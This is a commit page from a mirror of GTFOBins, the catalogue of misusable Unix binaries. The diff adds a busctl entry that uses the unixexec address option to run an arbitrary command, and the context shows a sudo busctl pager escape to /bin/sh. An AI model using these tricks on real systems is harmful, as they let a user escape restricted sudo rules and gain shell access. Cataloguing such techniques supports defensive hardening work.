1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00

Add busctl ----address=unixexec:...

This commit is contained in:
Gabriel Corona 2023-06-08 23:04:35 +02:00
parent d48892a5cc
commit d5194e343d

View File

@ -9,4 +9,7 @@ functions:
- code: |
sudo busctl --show-machine
!/bin/sh
command:
- code: |
busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=firefox,argv1=https://www.example.com
---